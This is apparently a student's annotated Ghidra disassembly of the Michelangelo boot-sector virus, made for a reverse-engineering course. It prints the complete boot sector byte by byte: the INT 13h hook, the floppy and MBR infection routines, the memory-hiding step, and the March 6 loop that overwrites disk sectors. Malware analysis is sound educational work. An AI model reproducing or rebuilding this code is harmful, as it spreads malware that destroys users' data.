;************************************************************************************************
;* File: michaelangelo.1 (for assignment 2&3 in GLND's RE) *
;* By: Zachary Robert James (zjames8@lsu.edu; zach15james@proton.me) *
;* Tool: Ghidra ... bc: *
;* (in FL with family, and Cisco VPN --> QNAP server --> VMware on my local laptop lacked permis...*
;* ie (i) rebasing, (ii) commenting, that it would be okay...) *
;************************************************************************************************
LAB_0000_7c00: ;XREF[2,1]: 0000:7cee(R),0000:7cee(R),0000:7cee(R)
ram:0000:7c00 e9ac00 JMP FUN_0000_7caf ;undefined FUN_0000_7caf()
;first jump to the entry pt of virus
DAT_0000_7c03: ;XREF[1]: 0000:7cf0(R)
ram:0000:7c03 f500 undefined2 00F5h ;High_Entry ie the offset to jump to ...
DAT_0000_7c05: ;XREF[1]: 0000:7cd8(W)
ram:0000:7c05 0000 undefined2 0000h ;High_Entry_Seg value (:= 0) for cont...
ram:0000:7c07 02 ?? 02h ;Disk_Heads (:= 2), destroying 2 at a...
ram:0000:7c08 0e ?? 0Eh ;Orig_BootS ~ sector # where original...
ram:0000:7c09 00 ?? 00h
DAT_0000_7c0a: ;XREF[1]: 0000:7cc1(W)
ram:0000:7c0a 3997 undefined2 9739h ;Int_13 offset where the MSDOS Disk I...
DAT_0000_7c0c: ;XREF[1]: 0000:7cc7(W)
ram:0000:7c0c 00f0 undefined2 F000h ;Int_13_Seg of the original int13 han...
;Evil_Int_13
ram:0000:7c0e 1e PUSH DS ;push 0 (defaulted)
ram:0000:7c0f 50 PUSH AX ;push 7C00 (base to use for offsettin...
ram:0000:7c10 0ad2 OR DL,DL ;check drive A... drive letter (dl is...
ram:0000:7c12 751b JNZ LAB_0000_7c2f ;if drive A unavailable (ZF != 0), ju...
ram:0000:7c14 33c0 XOR AX,AX ;wipe ax := 0 (on disk A) if jnz skipped
ram:0000:7c16 8ed8 MOV DS,AX ;ie set ds := ax = 0
ram:0000:7c18 f6063f0401 TEST byte ptr [0x43f],0x1 ;is the first bit (0-bit) set ie flop...
ram:0000:7c1d 7510 JNZ LAB_0000_7c2f ;if not ZF != 1 ie ZF = 0, then disk ...
ram:0000:7c1f 58 POP AX ;restore
ram:0000:7c20 1f POP DS
ram:0000:7c21 9c PUSHF ;save state before calling the real I...
ram:0000:7c22 2eff1e0a00 CALLF [0xa]
ram:0000:7c27 9c PUSHF ;save flags to reset after malware call
ram:0000:7c28 e80b00 CALL FUN_0000_7c36 ;floppy malware call
ram:0000:7c2b 9d POPF ;restore registers as they were before
ram:0000:7c2c ca0200 RETF 0x2 ;OHH... when this retuns, its discard...
LAB_0000_7c2f: ;XREF[2]: 0000:7c12(j),0000:7c1d(j)
ram:0000:7c2f 58 POP AX ;END ROUTINE... NO, rather: convolude...
ram:0000:7c30 1f POP DS
ram:0000:7c31 2eff2e0a00 JMPF CS:[DAT_0000_000a]
;************************************************************************************************
;* FUNCTION *
;************************************************************************************************
;undefined FUN_0000_7c36()
;INFECTION ROUTINE.... first called... and then inside you first save all these registers ie the register states... that is a sign (gleaned from xorpd puzzles) ie if you save the exact state or do things to reset the state as it was before, you are likely trying to hid / cover whats in the middle
;XREF[1]: 0000:7c28(c)
ram:0000:7c36 50 PUSH AX
ram:0000:7c37 53 PUSH BX
ram:0000:7c38 51 PUSH CX
ram:0000:7c39 52 PUSH DX
ram:0000:7c3a 1e PUSH DS
ram:0000:7c3b 06 PUSH ES
ram:0000:7c3c 56 PUSH SI
ram:0000:7c3d 57 PUSH DI
ram:0000:7c3e 0e PUSH CS ;CS --> DS ie DS:=CS
ram:0000:7c3f 1f POP DS
ram:0000:7c40 0e PUSH CS
ram:0000:7c41 07 POP ES ;ES:=CS
ram:0000:7c42 be0400 MOV SI,0x4 ;si:=4 (for later read ops)
LAB_0000_7c45: ;XREF[1]: 0000:7c5f(j)
ram:0000:7c45 b80102 MOV AX,0x201 ;AX := [AH = 02h ~ read sectors fn][A...
ram:0000:7c48 bb0002 MOV BX,0x200
ram:0000:7c4b b90100 MOV CX,0x1 ;cx:= 1
ram:0000:7c4e 33d2 XOR DX,DX ;dl = 0 ==> drive letter 0 ie drive A...
ram:0000:7c50 9c PUSHF ;save the current flags by pushing th...
ram:0000:7c51 ff1e0a00 CALLF [0xa] ;call real Int_13 handler ie [0xa]
ram:0000:7c55 730c JNC LAB_0000_7c63 ;note: GLDN's ida pro disassebmly had...
ram:0000:7c57 33c0 XOR AX,AX ;0s out ax
ram:0000:7c59 9c PUSHF ;save flags... for when you need to d...
ram:0000:7c5a ff1e0a00 CALLF [0xa] ;real Int_13 handler
ram:0000:7c5e 4e DEC SI ;retry_count--... proverbially
ram:0000:7c5f 75e4 JNZ LAB_0000_7c45 ;call itself (ie keep doing the loop ...
ram:0000:7c61 eb43 JMP LAB_0000_7ca6 ;done trying to infect ==> OMEGA!
;flop infected???
LAB_0000_7c63: ;XREF[1]: 0000:7c55(j)
ram:0000:7c63 33f6 XOR SI,SI ;to read 1st work of virus, the src i...
ram:0000:7c65 fc CLD ;makes string options increment si, di
ram:0000:7c66 ad LODSW SI ;load 1st word of virus ds:si --> ax
;************************************************************************************************
;* if both compares hold true then roughtly, it is likely it already has the virus *
;************************************************************************************************
ram:0000:7c67 3b07 CMP AX,word ptr [BX]
ram:0000:7c69 7506 JNZ LAB_0000_7c71
ram:0000:7c6b ad LODSW SI ;load 2nd word of vius into ds:si
ram:0000:7c6c 3b4702 CMP AX,word ptr [BX + 0x2]
ram:0000:7c6f 7435 JZ LAB_0000_7ca6 ;==> OMEGA (if 2 checks are the same,...
LAB_0000_7c71: ;XREF[1]: 0000:7c69(j)
ram:0000:7c71 b80103 MOV AX,0x301 ;back up location check for hiding th...
ram:0000:7c74 b601 MOV DH,0x1 ;head # 1
ram:0000:7c76 b103 MOV CL,0x3 ;sector # 3 (implied, unamed, track 0)
ram:0000:7c78 807f15fd CMP byte ptr [BX + 0x15],0xfd ;checking media sector byte (in DOS o...
ram:0000:7c7c 7402 JZ LAB_0000_7c80 ;if they are the same, then the backu...
ram:0000:7c7e b10e MOV CL,0xe ;else, try / go-to teh 14th sector fo...
LAB_0000_7c80: ;XREF[1]: 0000:7c7c(j)
ram:0000:7c80 890e0800 MOV word ptr [0x8],CX ;cache backup bootsector location
ram:0000:7c84 9c PUSHF ;save flags
ram:0000:7c85 ff1e0a00 CALLF [0xa] ;use real int to write backup bootsector
ram:0000:7c89 721b JC LAB_0000_7ca6 ;if it carried (ie failed the callf) ...
;source and dest of copy
ram:0000:7c8b bebe03 MOV SI,0x3be
ram:0000:7c8e bfbe01 MOV DI,0x1be
ram:0000:7c91 b92100 MOV CX,0x21
ram:0000:7c94 fc CLD
ram:0000:7c95 f3a5 MOVSW.REP ES:DI,SI ;repeat cx = 0x21h times (the for loo...
ram:0000:7c97 b80103 MOV AX,0x301
ram:0000:7c9a 33db XOR BX,BX ;es:bx is start of buffier ==> start ...
ram:0000:7c9c b90100 MOV CX,0x1
ram:0000:7c9f 33d2 XOR DX,DX
ram:0000:7ca1 9c PUSHF ;saves flags
ram:0000:7ca2 ff1e0a00 CALLF [0xa]
LAB_0000_7ca6: ;XREF[3]: 0000:7c61(j),0000:7c6f(j),0000:7c89(j)
ram:0000:7ca6 5f POP DI ;"OMEGA" function resets the register...
ram:0000:7ca7 5e POP SI
ram:0000:7ca8 07 POP ES
ram:0000:7ca9 1f POP DS
ram:0000:7caa 5a POP DX
ram:0000:7cab 59 POP CX
ram:0000:7cac 5b POP BX
ram:0000:7cad 58 POP AX
ram:0000:7cae c3 RET
;************************************************************************************************
;* FUNCTION *
;************************************************************************************************
;undefined FUN_0000_7caf()
;XREF[1]: 0000:7c00(c)
ram:0000:7caf 33c0 XOR AX,AX ;zeroing these out: ax,ds,ss
ram:0000:7cb1 8ed8 MOV DS,AX
ram:0000:7cb3 fa CLI ;disable interrupts for now
ram:0000:7cb4 8ed0 MOV SS,AX
ram:0000:7cb6 b8007c MOV AX,0x7c00
ram:0000:7cb9 8be0 MOV SP,AX ;load address is set to beginnning of...
ram:0000:7cbb fb STI ;restore interrupts
ram:0000:7cbc 1e PUSH DS ;save ds and ax states for later
ram:0000:7cbd 50 PUSH AX
ram:0000:7cbe a14c00 MOV AX,[0x4c] ;13h * 4 ~ offset of int13h hander ad...
ram:0000:7cc1 a30a7c MOV [DAT_0000_7c0a],AX ;MODIFYING / RESETTING INT13h offset ...
ram:0000:7cc4 a14e00 MOV AX,[0x4e]
ram:0000:7cc7 a30c7c MOV [DAT_0000_7c0c],AX ;= F000h
ram:0000:7cca a11304 MOV AX,[0x413]
ram:0000:7ccd 48 DEC AX ;reduce memory size
ram:0000:7cce 48 DEC AX
ram:0000:7ccf a31304 MOV [0x413],AX ;store that memory size - its stolen ...
ram:0000:7cd2 b106 MOV CL,0x6
ram:0000:7cd4 d3e0 SHL AX,CL ;gives the segment value as seg = ax ...
ram:0000:7cd6 8ec0 MOV ES,AX
ram:0000:7cd8 a3057c MOV [DAT_0000_7c05],AX ;new block is saved to Highentry seg ...
ram:0000:7cdb b80e00 MOV AX,0xe
ram:0000:7cde a34c00 MOV [0x4c],AX
ram:0000:7ce1 8c064e00 MOV word ptr [0x4e],ES
ram:0000:7ce5 b9be01 MOV CX,0x1be ;copying virus code
ram:0000:7ce8 be007c MOV SI,0x7c00
ram:0000:7ceb 33ff XOR DI,DI ;wiping di
ram:0000:7ced fc CLD
; FWD[2]: 0000:7c00(R),0000:7c01(R)
ram:0000:7cee f3a4 MOVSB.REP ES:DI,SI=>LAB_0000_7c00 ;copy normal int13 address for later ...
ram:0000:7cf0 2eff2e037c JMPF CS:[DAT_0000_7c03] ;jump ~ "jump far" ~ unconditional, i...
ram:0000:7cf5 33c0 XOR AX,AX
ram:0000:7cf7 8ec0 MOV ES,AX ;es := ax == 0
ram:0000:7cf9 cd13 INT 0x13 ;do the disk call... reset disk syste...
ram:0000:7cfb 0e PUSH CS ;ds := cs == evil int13 ?
ram:0000:7cfc 1f POP DS
ram:0000:7cfd b80102 MOV AX,0x201 ;says we will read one sector
ram:0000:7d00 bb007c MOV BX,0x7c00 ;we will read it into the memoy of th...
ram:0000:7d03 8b0e0800 MOV CX,word ptr [0x8] ;get the backup boot sector loction (...
ram:0000:7d07 83f907 CMP CX,0x7 ;is it a HD???
ram:0000:7d0a 7507 JNZ LAB_0000_7d13 ;no ==> floppy so run that code
ram:0000:7d0c ba8000 MOV DX,0x80 ;choose sector from first HD ==> read...
ram:0000:7d0f cd13 INT 0x13
ram:0000:7d11 eb2b JMP LAB_0000_7d3e
;floppy code
LAB_0000_7d13: ;XREF[1]: 0000:7d0a(j)
ram:0000:7d13 8b0e0800 MOV CX,word ptr [0x8] ;grabbing backup boot sector saved here
ram:0000:7d17 ba0001 MOV DX,0x100 ;==> drive letter A and dh (disk head) 1
ram:0000:7d1a cd13 INT 0x13
ram:0000:7d1c 7220 JC LAB_0000_7d3e ;if there is an error w/ this write /...
ram:0000:7d1e 0e PUSH CS
ram:0000:7d1f 07 POP ES ;es := cs
ram:0000:7d20 b80102 MOV AX,0x201 ;reading 1 sector..
ram:0000:7d23 bb0002 MOV BX,0x200 ;512 bytes beyond virus code
ram:0000:7d26 b90100 MOV CX,0x1 ;sector 1 (& track 0)
ram:0000:7d29 ba8000 MOV DX,0x80 ;set to read from HDD 1
ram:0000:7d2c cd13 INT 0x13 ;read in sectors... if error, go chec...
ram:0000:7d2e 720e JC LAB_0000_7d3e
ram:0000:7d30 33f6 XOR SI,SI ;source = 0 offset
ram:0000:7d32 fc CLD ;string ops increment si&di
ram:0000:7d33 ad LODSW SI ;load the string --> SI
ram:0000:7d34 3b07 CMP AX,word ptr [BX] ;does a word of this virus match a wo...
ram:0000:7d36 754f JNZ LAB_0000_7d87 ;no ==> then go do the HDD code check...
ram:0000:7d38 ad LODSW SI ;check 2nd word of the virus
ram:0000:7d39 3b4702 CMP AX,word ptr [BX + 0x2]
ram:0000:7d3c 7549 JNZ LAB_0000_7d87 ;doesn't match, then go to hdd infect...
;now virus code is read in...
LAB_0000_7d3e: ;XREF[5]: 0000:7d11(j),0000:7d1c(j),0000:7d2e(j),0000:7d96(j),
; 0000:7dac(j)
ram:0000:7d3e 33c9 XOR CX,CX ;so we can check the date, and either...
ram:0000:7d40 b404 MOV AH,0x4 ;fn code #4 ==> check date
ram:0000:7d42 cd1a INT 0x1a ;runs code & chacks date --saving to-...
ram:0000:7d44 81fa0603 CMP DX,0x306 ;is it 3/6 ie March 6???
ram:0000:7d48 7401 JZ LAB_0000_7d4b ;it is!!
ram:0000:7d4a cb RETF ;no... then retuns to real int 13 seg...
LAB_0000_7d4b: ;XREF[1]: 0000:7d48(j)
ram:0000:7d4b 33d2 XOR DX,DX ;head and drive 0
ram:0000:7d4d b90100 MOV CX,0x1 ;track 0, sector 1
LAB_0000_7d50: ;XREF[2]: 0000:7d7f(j),0000:7d85(j)
ram:0000:7d50 b80903 MOV AX,0x309 ;write 9 sectors... why the 300 + ??
ram:0000:7d53 8b360800 MOV SI,word ptr [0x8] ;grabbing backup boot sector
ram:0000:7d57 83fe03 CMP SI,0x3 ;is this a 360k floppy disk? ... will...
ram:0000:7d5a 7410 JZ LAB_0000_7d6c ;is a 360k floppy... then proceed w/ ...
ram:0000:7d5c b00e MOV AL,0xe ;non-360k floppy?
ram:0000:7d5e 83fe0e CMP SI,0xe
ram:0000:7d61 7409 JZ LAB_0000_7d6c ;continue deleting if its a floppy
ram:0000:7d63 b280 MOV DL,0x80 ;its a HD ==> max disk heads = 4 for ...
ram:0000:7d65 c606070004 MOV byte ptr [0x7],0x4
ram:0000:7d6a b011 MOV AL,0x11
;...continuing the deletion...
LAB_0000_7d6c: ;XREF[2]: 0000:7d5a(j),0000:7d61(j)
ram:0000:7d6c bb0050 MOV BX,0x5000 ;find buffer seg & offset at 5000h......
ram:0000:7d6f 8ec3 MOV ES,BX
ram:0000:7d71 cd13 INT 0x13 ;write sectors of disk
ram:0000:7d73 7304 JNC LAB_0000_7d79 ;continue to below OR if error, the n...
ram:0000:7d75 32e4 XOR AH,AH
ram:0000:7d77 cd13 INT 0x13
LAB_0000_7d79: ;XREF[1]: 0000:7d73(j)
ram:0000:7d79 fec6 INC DH ;check next disk head... and is it < ...
ram:0000:7d7b 3a360700 CMP DH,byte ptr [0x7]
ram:0000:7d7f 72cf JC LAB_0000_7d50 ;if head < max_heads ie there are mor...
ram:0000:7d81 32f6 XOR DH,DH ;reset head counter, increment track....
ram:0000:7d83 fec5 INC CH
ram:0000:7d85 ebc9 JMP LAB_0000_7d50 ;then run through this delete loop on...
;HDD special code
LAB_0000_7d87: ;XREF[2]: 0000:7d36(j),0000:7d3c(j)
ram:0000:7d87 b90700 MOV CX,0x7
ram:0000:7d8a 890e0800 MOV word ptr [0x8],CX
ram:0000:7d8e b80103 MOV AX,0x301 ;writing eins sector
ram:0000:7d91 ba8000 MOV DX,0x80 ;first HDD
ram:0000:7d94 cd13 INT 0x13 ;writing sectors
ram:0000:7d96 72a6 JC LAB_0000_7d3e ;go and check the date
ram:0000:7d98 bebe03 MOV SI,0x3be ;write the virus down for later...
ram:0000:7d9b bfbe01 MOV DI,0x1be ;copies the virus to a valid boot par...
ram:0000:7d9e b92100 MOV CX,0x21
ram:0000:7da1 f3a5 MOVSW.REP ES:DI,SI
ram:0000:7da3 b80103 MOV AX,0x301
ram:0000:7da6 33db XOR BX,BX
ram:0000:7da8 fec1 INC CL
ram:0000:7daa cd13 INT 0x13
ram:0000:7dac eb90 JMP LAB_0000_7d3e ;jumpt to the date check once the HDD...
ram:0000:7dae 00 ?? 00h
ram:0000:7daf 00 ?? 00h
ram:0000:7db0 00 ?? 00h
ram:0000:7db1 00 ?? 00h
ram:0000:7db2 00 ?? 00h
ram:0000:7db3 00 ?? 00h
ram:0000:7db4 00 ?? 00h
ram:0000:7db5 00 ?? 00h
ram:0000:7db6 00 ?? 00h
ram:0000:7db7 00 ?? 00h
ram:0000:7db8 00 ?? 00h
ram:0000:7db9 00 ?? 00h
ram:0000:7dba 00 ?? 00h
ram:0000:7dbb 00 ?? 00h
ram:0000:7dbc 00 ?? 00h
ram:0000:7dbd 00 ?? 00h
ram:0000:7dbe 00 ?? 00h
ram:0000:7dbf 00 ?? 00h
ram:0000:7dc0 00 ?? 00h
ram:0000:7dc1 00 ?? 00h
ram:0000:7dc2 00 ?? 00h
ram:0000:7dc3 00 ?? 00h
ram:0000:7dc4 00 ?? 00h
ram:0000:7dc5 00 ?? 00h
ram:0000:7dc6 00 ?? 00h
ram:0000:7dc7 00 ?? 00h
ram:0000:7dc8 00 ?? 00h
ram:0000:7dc9 00 ?? 00h
ram:0000:7dca 00 ?? 00h
ram:0000:7dcb 00 ?? 00h
ram:0000:7dcc 00 ?? 00h
ram:0000:7dcd 00 ?? 00h
ram:0000:7dce 00 ?? 00h
ram:0000:7dcf 00 ?? 00h
ram:0000:7dd0 00 ?? 00h
ram:0000:7dd1 00 ?? 00h
ram:0000:7dd2 00 ?? 00h
ram:0000:7dd3 00 ?? 00h
ram:0000:7dd4 00 ?? 00h
ram:0000:7dd5 00 ?? 00h
ram:0000:7dd6 00 ?? 00h
ram:0000:7dd7 00 ?? 00h
ram:0000:7dd8 00 ?? 00h
ram:0000:7dd9 00 ?? 00h
ram:0000:7dda 00 ?? 00h
ram:0000:7ddb 00 ?? 00h
ram:0000:7ddc 00 ?? 00h
ram:0000:7ddd 00 ?? 00h
ram:0000:7dde 00 ?? 00h
ram:0000:7ddf 00 ?? 00h
ram:0000:7de0 00 ?? 00h
ram:0000:7de1 00 ?? 00h
ram:0000:7de2 00 ?? 00h
ram:0000:7de3 00 ?? 00h
ram:0000:7de4 00 ?? 00h
ram:0000:7de5 00 ?? 00h
ram:0000:7de6 00 ?? 00h
ram:0000:7de7 00 ?? 00h
ram:0000:7de8 00 ?? 00h
ram:0000:7de9 00 ?? 00h
ram:0000:7dea 00 ?? 00h
ram:0000:7deb 00 ?? 00h
ram:0000:7dec 00 ?? 00h
ram:0000:7ded 00 ?? 00h
ram:0000:7dee 00 ?? 00h
ram:0000:7def 00 ?? 00h
ram:0000:7df0 00 ?? 00h
ram:0000:7df1 00 ?? 00h
ram:0000:7df2 00 ?? 00h
ram:0000:7df3 00 ?? 00h
ram:0000:7df4 00 ?? 00h
ram:0000:7df5 00 ?? 00h
ram:0000:7df6 00 ?? 00h
ram:0000:7df7 00 ?? 00h
ram:0000:7df8 00 ?? 00h
ram:0000:7df9 00 ?? 00h
ram:0000:7dfa 00 ?? 00h
ram:0000:7dfb 00 ?? 00h
ram:0000:7dfc 00 ?? 00h
ram:0000:7dfd 00 ?? 00h
ram:0000:7dfe 55 ?? 55h U
ram:0000:7dff aa ?? AAh